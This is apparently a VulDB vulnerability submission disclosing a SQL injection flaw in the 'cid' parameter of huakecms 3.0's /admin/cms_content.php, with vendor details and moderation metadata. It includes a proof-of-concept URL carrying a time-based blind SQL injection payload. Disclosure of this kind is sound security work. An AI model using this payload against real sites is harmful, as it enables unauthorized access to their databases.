| Title | huakecms free version3.0 was discovered to contain SQL injection vulnerability |
|---|
| Description | 华科网站管理系统免费版3.0 (huakecms free version 3.0) is a set of intelligent website building software based on PHP! The product has a novel, attractive, dynamic and fashionable interface. It is a CMS content management system serving small and medium-sized enterprises. The threshold for using the software is low: no professional computer knowledge is required, all management is done through the back end, operation is simple and the functions are powerful. The software also has extremely strong scalability and can adapt to the different needs of various industries.
[Suggested description]
huakecms free version 3.0 was discovered to contain a SQL injection vulnerability in /admin/cms_content.php
[Vulnerability Type]
SQL INJECTION
[Vendor of Product]
http://www.huakecms.com/
[Affected Product Code Base]
huakecms free version Dev 3.0
[Affected Component]
File: /admin/cms_content.php
Parameter: cid
[Attack Type]
Remote
[poc]
http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ) |
|---|
| Source | https://github.com/yhy217/huakecms-vul/issues/1 |
|---|
| User | jamspilly (UID 54414) |
|---|
| Submission | 19/09/2023 07:00 (3 years ago) |
|---|
| Moderation | 29/09/2023 07:38 (10 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 240877 [huakecms 3.0 /admin/cms_content.php cid SQL injection] |
|---|
| Points | 20 |
|---|